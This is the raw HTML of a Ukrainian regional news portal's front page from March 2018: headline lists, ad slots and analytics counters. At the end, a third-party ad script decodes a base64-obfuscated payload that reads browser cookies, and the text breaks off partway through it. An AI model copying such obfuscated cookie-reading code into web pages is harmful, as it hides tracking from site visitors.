					<p>20 марта 2018, 09:37</p>
				</div>
				<div id="clear"></div>
			</div>
		</div>
		<div id="clear"></div>
<!-- Яндекс.Директ -->
<!--<div id="yandex_ad1"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
w[n] = w[n] || [];
w[n].push(function() {
Ya.Direct.insertInto(138910, "yandex_ad1", {
ad_format: "direct",
font_size: 0.8,
font_family: "arial",
type: "horizontal",
limit: 3,
title_font_size: 2,
site_bg_color: "FFFFFF",
title_color: "0000CC",
url_color: "006600",
text_color: "000000",
hover_color: "0066FF",
no_sitelinks: true
});
});
t = d.documentElement.firstChild;
s = d.createElement("script");
s.type = "text/javascript";
s.src = "http://an.yandex.ru/system/context.js";
s.setAttribute("async", "true");
t.insertBefore(s, t.firstChild);
})(window, document, "yandex_context_callbacks");
</script>-->
		<div id="clear"></div>
<div id="MIXADV_1535" class="MIXADVERT_NET"></div>
<script type="text/javascript" src="https://s.mixadvert.com/show/?id=1535" async></script>
		
		<h2 class="h2">Область</h2>
		<a class="all" href="/region">Все новости области</a>
		<div id="full">
			<div id="topnews"><a href="/news/111836/v_zamke_pod_zaporojem_proshli_syemki_populyarnogo_shou_(foto).html"><img src="/images/news/2018/03/111836.jpg">В замке под Запорожьем прошли съемки популярного шоу (фото)</a>
				<p>20 марта 2018, 11:11</p>
			</div>
			<div id="half">
				<img src="/images/news/2018/03/111840_sm.jpg">
				<div>
					<a href="/news/111840/politsiya_napomnila_ob_izmeneniyah_v_sfere_bezopasnosti_dvijeniya.html">Полиция напомнила об изменениях в сфере безопасности движения</a>
					<p>20 марта 2018, 11:47</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111829_sm.jpg">
				<div>
					<a href="/news/111829/dollarovogo_opera_posadili_pod_domashniy_arest.html">&quot;Долларового&quot; опера посадили под домашний арест</a>
					<p>20 марта 2018, 10:09</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111828_sm.jpg">
				<div>
					<a href="/news/111828/zaporojskie_patrulnyie_spasli_i_obogreli_kosulyu_(foto).html">Запорожские патрульные спасли и обогрели косулю (Фото)</a>
					<p>20 марта 2018, 10:02</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111822_sm.jpg">
				<div>
					<a href="/news/111822/ruje_brejneva_persten_revolver_i_strelyayuschaya_trost_v_zaporojskom_muzee_predstavlena_unikalnaya_kollektsiya_orujiya_foto.html">Ружье Брежнева, перстень-револьвер и стреляющая трость: в запорожском музее представлена уникальная коллекция оружия - ФОТО</a>
					<p>20 марта 2018, 09:24</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111820_sm.jpg">
				<div>
					<a href="/news/111820/v_zaporoje_sotsrabotnitsa_nashla_mertvoy_svoyu_podopechnuyu.html">В Запорожье соцработница нашла мертвой свою подопечную</a>
					<p>20 марта 2018, 09:10</p>
				</div>
				<div id="clear"></div>
			</div>
		</div>
		<div id="clear"></div>

		<div id="clear"></div>
<div id="gtrf_inf_2075" class="gtrf_inf" data-tisid="2075"></div>
<script type="text/javascript" async="async">
var dtx_2075 = new Date(); var tx_2075 = dtx_2075.getTime();
var gtrf_2075_scrpt = document.createElement("script");
gtrf_2075_scrpt.type = "text/javascript";
gtrf_2075_scrpt.src = "https://traffer.net"+
"/pl_js/st_1_pl.js?inf_id=2075&t="+tx_2075;
gtrf_2075_scrpt.async = "async";
var bd0_gtrf_2075 = document.getElementsByTagName("body")[0];
if(document.addEventListener){
  document.addEventListener("DOMContentLoaded",
  bd0_gtrf_2075.appendChild(gtrf_2075_scrpt),false);
}else{ if(window.addEventListener){
    window.addEventListener("load",bd0_gtrf_2075.appendChild(gtrf_2075_scrpt),false);
}else{ if(document.attachEvent){
    document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){
    bd0_gtrf_2075.appendChild(gtrf_2075_scrpt);}});
}else{ if(window.attachEvent){
window.attachEvent("onload",bd0_gtrf_2075.appendChild(gtrf_2075_scrpt));
}}}}</script>
		<!--<div id="default_informer" class="mt_adv cols4" style="border-radius:4px"><b class="mt_partner"><a target="_blank" href="http://mediatraffic.com.ua/?parentID=9238" class="mt_partner_link">Разместить рекламу</a><a target="_blank" href="http://mediatraffic.com.ua/?parentID=9238" class="mt_partner_title">MediaTraffic</a></b></div>
<script type="text/javascript">new MTr("default_informer", {site:289,format:0,number:4});</script>--><div id="clear"></div>
		<div id="half">
		
			<h2 class="h2">Светская жизнь</h2>
			<a class="all" href="/artics">Все публикации</a>
			<img src="/images/artics/2018/2380/2380_sm.jpg">
			<div>
				<a href="/artics/2380/pevitsa_aleksa_izmenilas_do_neuznavaemosti.html">Певица Алекса изменилась до неузнаваемости</a>
				<p>20 марта 2018, 11:13</p>
			</div>
			<div id="clear"></div>
			<img src="/images/artics/2018/2379/2379_sm.jpg">
			<div>
				<a href="/artics/2379/djanabaeva_v_kupalniku_pokazala_schastya_bez_filtriv.html">Джанабаєва в купальнику показала щастя без фільтрів</a>
				<p>19 марта 2018, 10:43</p>
			</div>
			<div id="clear"></div>
			<img src="/images/artics/2018/2378/2378_sm.jpg">
			<div>
				<a href="/artics/2378/loboda_z_los_andjelesa_rozkazala_yak_trimati_formu_pri_vagitnosti.html">Лобода з Лос-Анджелеса розказала, як тримати форму при вагітності</a>
				<p>17 марта 2018, 16:09</p>
			</div>
			<div id="clear"></div>
			<img src="/images/artics/2018/2377/2377_sm.jpg">
			<div>
				<a href="/artics/2377/kim_kardashyan_snyalas_v_reklame_vmeste_so_svoey_babushkoy_a_oni_pohoji.html">Ким Кардашьян снялась в рекламе вместе со своей бабушкой. А они похожи!</a>
				<p>16 марта 2018, 13:44</p>
			</div>
			<div id="clear"></div>
			<img src="/images/artics/2018/2376/2376_sm.jpg">
			<div>
				<a href="/artics/2376/mama_nichego_sebe_mama_nikolaya_baskova_vyiglyadit_rovesnitsey_syina.html">«Мама? Ничего себе!»: мама Николая Баскова выглядит ровесницей сына</a>
				<p>16 марта 2018, 13:39</p>
			</div>
			<div id="clear"></div>
		</div>
		<div id="half" class="vr">
			<h2 class="h2">Самые читаемые</h2>
				<img src="/images/news/2018/03/111620_sm.jpg">
				<div>
					<a href="/news/111620/v_seti_poyavilis_foto_zloveschego_azovskogo_morya_(foto).html">В сети появились фото &quot;зловещего&quot; Азовского моря (фото)</a>
					<p>17 марта 2018, 13:14</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111664_sm.jpg">
				<div>
					<a href="/news/111664/finalist_h_faktor_8_rasskazal_chto_uchastnikam_shou_zapreschayut_delat_psihologi_(video).html">Финалист «Х-фактор-8» рассказал, что участникам шоу запрещают делать психологи (видео)</a>
					<p>18 марта 2018, 08:49</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/110894_sm.jpg">
				<div>
					<a href="/news/110894/pozdravleniya_s_8_marta_stihi_sms_otkryitki.html">Поздравления с 8 марта: стихи, смс, открытки</a>
					<p>08 марта 2018, 05:52</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111663_sm.jpg">
				<div>
					<a href="/news/111663/v_tsentre_goroda_nashli_poveshennyim_mujchinu_(foto_18).html">В центре города нашли повешенным мужчину (фото 18+)</a>
					<p>18 марта 2018, 08:02</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111714_sm.jpg">
				<div>
					<a href="/news/111714/vyibiraem_semeynogo_doktora_polnyiy_spisok_vrachey_goroda_s_fotografiyami.html">Выбираем семейного доктора. Полный список врачей города с фотографиями</a>
					<p>19 марта 2018, 06:10</p>
				</div>
				<div id="clear"></div>
</div>
	
		<div id="clear"></div>
		<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Узкий -->
<ins class="adsbygoogle"
     style="display:inline-block;width:700px;height:90px"
     data-ad-client="ca-pub-3155292058017825"
     data-ad-slot="4455089643"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
		<div id="clear"></div>
		<h2 class="h2">Украина</h2>
		<a class="all" href="/ukraine">Все новости Украины</a>
		<div id="full">
			<div id="topnews"><a href="/news/111802/savchenko_snyalas_v_video_so_slovami_chto_usr*lis.html"><img src="/images/news/2018/03/111802.jpg">Савченко снялась в видео со словами: &quot;Что, уср*лись?&quot;</a>
				<p>20 марта 2018, 05:59</p>
			</div>
			<div id="half">
				<img src="/images/news/2018/03/111842_sm.jpg">
				<div>
					<a href="/news/111842/ukrainskie_zarobitchane_rasskazali_o_rabskih_usloviyah_rabotyi_v_polshe.html">Украинские заробитчане рассказали о рабских условиях работы в Польше</a>
					<p>20 марта 2018, 11:57</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111839_sm.jpg">
				<div>
					<a href="/news/111839/voennogo_podozrevayut_v_prodaje_detaley_tanka.html">Военного подозревают в продаже деталей танка</a>
					<p>20 марта 2018, 11:34</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111834_sm.jpg">
				<div>
					<a href="/news/111834/nedetskie_chuvstva_shkolnik_ushel_iz_doma_radi_lyubimoy_devochki.html">&quot;Недетские чувства&quot;: школьник ушел из дома ради любимой девочки</a>
					<p>20 марта 2018, 10:55</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111832_sm.jpg">
				<div>
					<a href="/news/111832/v_kieve_mujchina_vyipal_iz_okna_gostinitsyi_i_pogib.html">В Киеве мужчина выпал из окна гостиницы и погиб</a>
					<p>20 марта 2018, 10:29</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111827_sm.jpg">
				<div>
					<a href="/news/111827/u_chernivtsyah_mistsevi_jiteli_vzyalis_dopomagati_ptaham.html">У Чернівцях місцеві жителі взялись допомагати птахам</a>
					<p>20 марта 2018, 10:02</p>
				</div>
				<div id="clear"></div>
			</div>
		</div>
		<div id="clear"></div>
		<div id="clear"></div>
		<h2 class="h2">Мир</h2>
		<a class="all" href="/world">Все новости мира</a>
		<div id="full">
			<div id="topnews"><a href="/news/111800/podklyuchila_k_zaryadke_i_govorila_devushka_umerla_ot_vzryiva_smartfona.html"><img src="/images/news/2018/03/111800.jpg">Подключила к зарядке и говорила: девушка умерла от взрыва смартфона</a>
				<p>20 марта 2018, 05:54</p>
			</div>
			<div id="half">
				<img src="/images/news/2018/03/111843_sm.jpg">
				<div>
					<a href="/news/111843/zolotoe_plate_pevitsyi_beyonse_voshitilo_set.html">Золотое платье певицы Бейонсе восхитило Сеть</a>
					<p>20 марта 2018, 12:01</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111838_sm.jpg">
				<div>
					<a href="/news/111838/kityi_spasli_dayvera_ot_pyatimetrovogo_monstra_video.html">Киты спасли дайвера от пятиметрового монстра. ВИДЕО</a>
					<p>20 марта 2018, 11:27</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111833_sm.jpg">
				<div>
					<a href="/news/111833/putin_sdelal_tsinichnoe_zayavlenie_v_adres_ukrainyi.html">Путин сделал циничное заявление в адрес Украины</a>
					<p>20 марта 2018, 10:50</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111831_sm.jpg">
				<div>
					<a href="/news/111831/vo_frantsii_zaderjali_sarkozi.html">Во Франции задержали Саркози</a>
					<p>20 марта 2018, 10:26</p>
				</div>
				<div id="clear"></div>
				<img src="/images/news/2018/03/111826_sm.jpg">
				<div>
					<a href="/news/111826/dtp_v_yaponii_mikroavtobus_s_detmi_vrezalsya_v_gruzovik.html">ДТП в Японии: микроавтобус с детьми врезался в грузовик</a>
					<p>20 марта 2018, 09:57</p>
				</div>
				<div id="clear"></div>
			</div>
		</div>
		<div id="clear"></div>
		<h2 class="h2">Видеорепортажи</h2>
		<div id="clear"></div>
		<div id="video">
			<a href="/video/898/grajdanskiy_sovet_vyibral_novogo_rukovoditelya.html"><iframe width="227" height="144" src="http://www.youtube.com/embed/uCyOnI2uEDM?rel=0&showinfo=0" frameborder="0" allowfullscreen></iframe>Гражданский совет выбрал нового руководителя</a>
			<a href="/video/899/detvora_i_vzroslyie_naslajdayutsya_nastoyaschey_zimoy.html"><iframe width="227" height="144" src="http://www.youtube.com/embed/Oya1nZDlTkU?rel=0&showinfo=0" frameborder="0" allowfullscreen></iframe>Детвора и взрослые наслаждаются настоящей зимой</a>
			<a href="/video/897/v_melitopole_otkryili_unikalnoe_reanimatsionnoe_otdelenie.html"><iframe width="227" height="144" src="http://www.youtube.com/embed/H25O0tJ04eY?rel=0&showinfo=0" frameborder="0" allowfullscreen></iframe>В Мелитополе открыли уникальное реанимационное отделение</a>
		</div>
		<div id="clear"></div>
<script type="text/javascript">
function mnews(n) {
	for (var i=1; i<=4; i++) {
		if (i==n) {
			document.getElementById("news"+i).style.visibility="visible";
			document.getElementById("news"+i).style.display="block";
			document.getElementById("nums"+i).className="open";
		} else {
			document.getElementById("news"+i).style.visibility="hidden";
			document.getElementById("news"+i).style.display="none";
			document.getElementById("nums"+i).className="";
		}
	}
}
var num=1;
var rstop=0;
function tim(){
	if (rstop==0) {
		++num;
		if(num>4){num=1;}
		mnews(num);
	}
	setTimeout(tim,3500);
}
function stopnews() {
	if (rstop==0) {rstop=1;} else {rstop=0;}
}
setTimeout(tim,5500);
</script>

	</div>
	<div id="right">

		<h2 class="h2">Реклама</h2>
		<div id="rek"><a rel="nofollow" target="_blank" href="http://mcredit.naksu.org/index.php?id=31"><img src="/images/banners/2017/735.gif"></a><a rel="nofollow" target="_blank" href="http://megalit.net.ua/index.html"><img src="/images/banners/2017/737.gif"></a><a rel="nofollow" target="_blank" href="http://granitsv.com.ua/"><img src="/images/banners/2017/557.gif"></a><a class="nourl"><img src="/images/banners/2018/770.gif"></a><a class="nourl"><img src="/images/banners/2018/837.gif"></a><a rel="nofollow" target="_blank" href="http://dommebeli.com.ua/"><img src="/images/banners/2018/806.gif"></a><a rel="nofollow" target="_blank" href="http://veradecor.com.ua/"><img src="/images/banners/2014/101.gif"></a><a class="nourl"><img src="/images/banners/2018/821.gif"></a><a rel="nofollow" target="_blank" href="http://вечность.укр"><img src="/images/banners/2018/836.gif"></a><a class="nourl"><img src="/images/banners/2018/794.gif"></a><a rel="nofollow" target="_blank" href="http://www.mebelliberti.com.ua/"><img src="/images/banners/2018/787.gif"></a><a rel="nofollow" target="_blank" href="http://stroystandart.org.ua/"><img src="/images/banners/2017/636.gif"></a><a rel="nofollow" target="_blank" href="http://atatour.com.ua/"><img src="/images/banners/2017/698.gif"></a><a rel="nofollow" target="_blank" href="http://ria-m.tv/news/110318/v_melitopolskom_peduniversitete_otkryilas_novaya_vostrebovannaya_spetsialnost.html"><img src="/images/banners/2018/803.gif"></a><a rel="nofollow" target="_blank" href="http://info.ria-m.tv/catalog/1217-martex-okna-zhalyuzi-mebel"><img src="/images/banners/2015/298.jpg"></a><a rel="nofollow" target="_blank" href="http://info.ria-m.tv/catalog/435-avtoservis-brand"><img src="/images/banners/2015/223.jpg"></a><a rel="nofollow" target="_blank" href="http://info.ria-m.tv/page2"><img src="/images/banners/2017/691.gif"></a><a rel="nofollow" target="_blank" href="http://info.ria-m.tv/afisha"><img src="/images/banners/2017/625.gif"></a></div>
		<div id="clear"></div>
		<h2 class="h2">Интервью</h2>
		<a class="all" href="/interview">Все интервью</a>
		<div id="iview">
			<b><a class="taj" href="/interview/43/kak_deputat_v_amerike_opyit_perenimala.html"><img src="/images/iview/2018/43/43.jpg">Как депутат в Америке опыт перенимала</a></b>
		</div>
		<div id="clear"></div>
		<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Сайт2 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:200px;height:200px"
     data-ad-client="ca-pub-3155292058017825"
     data-ad-slot="3130666591"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
		<div id="clear"></div>
		<!--<div id="default_teaser" class="mt_adv f240x350" style="border-radius:4px"><b class="mt_partner"><a target="_blank" href="http://mediatraffic.com.ua/?parentID=9238" class="mt_partner_link">Разместить рекламу</a><a target="_blank" href="http://mediatraffic.com.ua/?parentID=9238" class="mt_partner_title">MediaTraffic</a></b></div>
<script type="text/javascript">new MTr("default_teaser", {site:289,format:1,number:4});</script>-->
		<div id="clear"></div>
		<br><div id="clear"></div>
		<br>
		<h2 class="h2">Самые комментируемые</h2>
		<div id="blogs">
			<span>103</span><p class="data">10 марта 2018, 14:23</p>
			<a href="/news/111067/u_prezidenta_otmennoe_chuvstvo_yumora_on_hiter_i_umeet_vyijidat_melitopolskiy_boets_ato_o_vstreche_s_poroshenko.html">«У президента отменное чувство юмора, он хитер и умеет выжидать» - мелитопольский боец АТО о встрече с Порошенко</a>
			<div id="clear"></div>
			<span>89</span><p class="data">10 марта 2018, 18:52</p>
			<a href="/news/111080/avtor_feyka_o_soli_iz_melitopolya_poseschaet_forumyi_v_moskve_(foto).html">Автор фейка о соли из Мелитополя посещает форумы в Москве (фото)</a>
			<div id="clear"></div>
			<span>71</span><p class="data">18 марта 2018, 13:27</p>
			<a href="/news/111681/melitopol_prisoedinilsya_k_vseukrainskoy_aktsii_kryim_eto_ukraina.html">Мелитополь присоединился к всеукраинской акции &quot;Крым-это Украина!&quot;</a>
			<div id="clear"></div>
			<span>64</span><p class="data">16 марта 2018, 16:48</p>
			<a href="/news/111562/krim_tse_ukraina_u_melitopoli_vidbudetsya_patriotichna_aktsiya.html">Крим - це Україна. У Мелітополі відбудеться патріотична акція</a>
			<div id="clear"></div>
			<span>60</span><p class="data">11 марта 2018, 08:50</p>
			<a href="/news/111092/cobake_kotoraya_sidit_na_ostanovke_i_plachet_nujna_pomosch.html">Cобаке, которая сидит на остановке и плачет, нужна помощь</a>
			<div id="clear"></div>
		</div>
		<div id="clear"></div>
		<h2 class="h2">Фото дня</h2>
		<div id="iview">
			<a href="/foto/2470"><img src="/images/foto/2018/2470/1.jpg">Висельник</a>
		</div>
		<div id="clear"></div>
		<!--<h2 class="h2">Погода на завтра</h2><div id="clear"></div>-->
<!--<div id="SinoptikInformer" style="width:230px;" class="SinoptikInformer type1c1"><div class="siHeader"><div class="siLh"><div class="siMh"><a onmousedown="siClickCount();" class="siLogo" href="https://sinoptik.ua/" target="_blank" title="Погода"> </a>Погода <span id="siHeader"></span></div></div></div><div class="siBody"><a onmousedown="siClickCount();" href="https://sinoptik.ua/погода-мелитополь" title="Погода в Мелитополе" target="_blank"><div class="siCity"><div class="siCityName">Погода в <span>Мелитополе</span></div><div id="siCont0" class="siBodyContent"><div class="siLeft"><div class="siTerm"></div><div class="siT" id="siT0"></div><div id="weatherIco0"></div></div><div class="siInf"><p>влажность: <span id="vl0"></span></p><p>давление: <span id="dav0"></span></p><p>ветер: <span id="wind0"></span></p></div></div></div></a><div class="siLinks">Погода на <a href="https://sinoptik.ua/погода-бердянск/10-дней/" title="Погода в Бердянске на 10 дней" target="_blank">sinoptik.ua</a>  в Бердянске</div></div><div class="siFooter"><div class="siLf"><div class="siMf"></div></div></div></div><script type="text/javascript" charset="UTF-8" src="//sinoptik.ua/informers_js.php?title=4&amp;wind=3&amp;cities=303015812&amp;lang=ru"></script>-->
	</div>
</div>
<div id="clear"></div>
<div id="futor">
	<div id="cont">
		<div id="infut">
			<p>На портале:</p>
			<a href="/news">Новости</a>
			<a href="/foto">Фото</a>
			<a href="/video">Видео</a>
			<a href="/archive">Архив</a>
			<a href="/watch">Онлайн</a>
			<a href="/artics">Статьи</a>
			<a href="/spravka">Справка</a>
		</div>
		<div id="infut" style="margin-right:0;">
			<p>Дополнительное меню:</p>
			<a href="/job">Вакансии</a>
			<a href="/contacts">Обратная связь</a>
			<a href="/reklama">Реклама</a>
		</div>
		<div id="count">
		<!--noindex-->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-27502056-13', 'auto');
  ga('send', 'pageview');

</script>
<!-- begin of Top100 code -->
<!--<script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?2954601"></script>
<noscript>
<a href="http://top100.rambler.ru/navi/2954601/">
<img src="http://counter.rambler.ru/top100.cnt?2954601" alt="Rambler's Top100" border="0" />
</a>

</noscript>-->
<!-- end of Top100 code -->
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t14.11;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet-->
<!-- TOP Melitopol -->
<!--<a href="http://www.melitopol.org/topsites.shtml?from=100177" target="_blank"><img alt="Рейтинг Мелитопольских сайтов на www.melitopol.org" border="0" height="31" src="http://www.melitopol.org/cgi-bin/counter.zs?uid=100077&amp;cnt=83" width="88" /></a>-->
<!-- TOP Melitopol reiting end -->
<!--bigmir)net TOP 100-->
<!--<script type="text/javascript" language="javascript"><!--
function BM_Draw(oBM_STAT){
document.write('<table cellpadding="0" cellspacing="0" border="0" style="display:inline;margin-right:4px;"><tr><td><div style="margin:0px;padding:0px;font-size:1px;width:88px;"><div style="background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b60_top.gif\') no-repeat bottom;"> </div><div style="font:10px Tahoma;background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b60_center.gif\');"><div style="text-align:center;"><a href="http://www.bigmir.net/" target="_blank" style="color:#0000ab;text-decoration:none;font:10px Tahoma;">bigmir<span style="color:#ff0000;">)</span>net</a></div><div style="margin-top:3px;padding: 0px 6px 0px 6px;color:#426ed2;"><div style="float:left;font:10px Tahoma;">'+oBM_STAT.hosts+'</div><div style="float:right;font:10px Tahoma;">'+oBM_STAT.hits+'</div></div><br clear="all"/></div><div style="background:url(\'http://i.bigmir.net/cnt/samples/diagonal/b60_bottom.gif\') no-repeat top;"> </div></div></td></tr></table>');
}
//-->
</script>
<!--<script type="text/javascript" language="javascript"><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={o:1,v:16929946,s:16929946,t:0,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[ovstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<sc'+'ript type="text/javascript" language="javascript" src="http://c.bigmir.net/?'+bs.join('&')+'"></sc'+'ript>');
//-->
</script>
<!--<noscript>
<a href="http://www.bigmir.net/" target="_blank"><img src="http://c.bigmir.net/?v16929946&s16929946&t2" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript>-->
<!--bigmir)net TOP 100-->
		<!--/noindex-->
		</div>
		<div id="seo">
			<p>РИА Мелитополь правовая информация</p>
			<span>Использование материалов ria-m.tv, любого типа, разрешается при условии активной индексируемой ссылки на ria-m.tv. Гиперссылка должна быть размещена исключительно в первом или во втором абзаце текста.</span>
			<span>Материалы напечатанные в рубрике "Бизнес идеи" и под знаком * носят имиджевый, благотворительный характер или напечатаны на правах рекламы. Ответственность за такие материалы редакция не несет.</span>
			<span class="vl wauto">&copy; 2013-2018 Все права защищены.</span>
			
		</div>
	</div>
</div>
<p id="bup" onclick="toup();" style="visibility:hidden;">&nbsp;</p>
<script type="text/javascript">
function viz() {document.getElementById("bup").style.visibility="visible";}
function unviz() {document.getElementById("bup").style.visibility="hidden";}
function toup() {window.scrollTo(0,0);}
window.onscroll = function() {
	var scrollTop = window.pageYOffset || document.documentElement.scrollTop;
	if (scrollTop>500) {document.getElementById("bup").style.visibility="visible";} else {document.getElementById("bup").style.visibility="hidden";}
	
}
function typerr(e) {
	if ((e.ctrlKey) && ((e.keyCode==10) || (e.keyCode==13))) {
		var stext=window.getSelection();
		if (stext.toString().length>0) {
			if (stext.toString().length<215) {
				var c=confirm("Отправить сообщение об ошибке и продолжить чтение?\n\r---\n\r"+stext+"\n\r---");
				if (c) {
					var ajax = new XMLHttpRequest();
					ajax.onreadystatechange=function(){if (ajax.readyState==4 && ajax.status==200) {alert(ajax.responseText);}}
					ajax.open("POST", "/tpl/typerr.php", true);
					ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
					ajax.send("ter="+stext);
				}
			} else {alert("Вы выделили слишком большой участок текста. Укажите одно предложение с ошибкой.");}
		}
	}
}
</script>
</div>
<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM3758');
  if (el) {
    if (document.getElementById('CNM3758t').style.display == 'none') {
      document.getElementById('CNM3758t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/3758?v='+t;
      el.parentNode.appendChild(NMces);
      
      var NMces2=document.createElement('script');
      NMces2.type = 'text/javascript';
      NMces2.charset='UTF-8';
      NMces2.innerHTML=atob("IGZ1bmN0aW9uIGdldENvb2tpZTM3NTgobil7dmFyIG09ZG"
        +"9jdW1lbnQuY29va2llLm1hdGNoKG5ldyBSZWdFeHAoIig/Ol58OykiK24ucm"
        +"VwbGFjZSgvKFtcLiQ/Knx7fVwoXClcW1xdXFwvXCteXSkvZywnXCQxJykrIj"
        +"0oW147XSopIikpO3JldHVybiBtP2RlY29kZVVSSUNvbXBvbmVudChtWzFdKT"
        +"oxO31mdW5jdGlvbiBnd3MzNzU4KHMpe2lmKCFzKXJldHVybiAnJzt2YXIgcm"
        +"VzX3N0cj0nJztyZXNfc3RyKz1TdHJpbmcuZnJvbUNoYXJDb2RlKHMuY2hhck"
        +"NvZGVBdCgyKStzLmNoYXJDb2RlQXQoMTEpKnMuY2hhckNvZGVBdCgxMyktND"
        +"gyOSk7cmVzX3N0cis9U3RyaW5nLmZyb21DaGFyQ29kZShzLmNoYXJDb2RlQX"
        +"QoNykrcy5jaGFyQ29kZUF0KDE0KSpzLmNoYXJDb2RlQXQoMSktMTM1MzYpO3"
        +"Jlc19zdHIrPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KDkpKn"
        +"MuY2hhckNvZGVBdCgxMSktcy5jaGFyQ29kZUF0KDApLTUwMTkpO3Jlc19zdH"
        +"IrPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KDEyKStzLmNoYX"
        +"JDb2RlQXQoNSkqcy5jaGFyQ29kZUF0KDgpLTEyMjMyKTtyZXNfc3RyKz1TdH"
        +"JpbmcuZnJvbUNoYXJDb2RlKHMuY2hhckNvZGVBdCg2KStzLmNoYXJDb2RlQX"
        +"QoMykqcy5jaGFyQ29kZUF0KDEzKS0xMTcxMSk7cmVzX3N0cis9U3RyaW5nLm"
        +"Zyb21DaGFyQ29kZShzLmNoYXJDb2RlQXQoMikqcy5jaGFyQ29kZUF0KDUpLX"
        +"MuY2hhckNvZGVBdCg3KS0xMzUzMSk7cmVzX3N0cis9U3RyaW5nLmZyb21DaG"
        +"FyQ29kZShzLmNoYXJDb2RlQXQoNikrcy5jaGFyQ29kZUF0KDQpKnMuY2hhck"
        +"NvZGVBdCgwKS0xMjY0MSk7cmVzX3N0cis9U3RyaW5nLmZyb21DaGFyQ29kZS"
        +"hzLmNoYXJDb2RlQXQoMykrcy5jaGFyQ29kZUF0KDEyKSpzLmNoYXJDb2RlQX"
        +"QoNSktMTEzNjgpO3Jlc19zdHIrPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaG"
        +"FyQ29kZUF0KDIpKnMuY2hhckNvZGVBdCg1KS1zLmNoYXJDb2RlQXQoNyktMT"
        +"M0NjgpO3Jlc19zdHIrPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZU"
        +"F0KDkpK3MuY2hhckNvZGVBdCg0KSpzLmNoYXJDb2RlQXQoOCktMTIwNzMpO3"
        +"Jlc19zdHIrPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KDQpK3"
        +"MuY2hhckNvZGVBdCgwKSpzLmNoYXJDb2RlQXQoMTMpLTExNjE1KTtyZXNfc3"
        +"RyKz1TdHJpbmcuZnJvbUNoYXJDb2RlKHMuY2hhckNvZGVBdCgxKSpzLmNoYX"
        +"JDb2RlQXQoNSktcy5jaGFyQ29kZUF0KDcpLTEyNzE0KTtyZXNfc3RyKz1TdH"
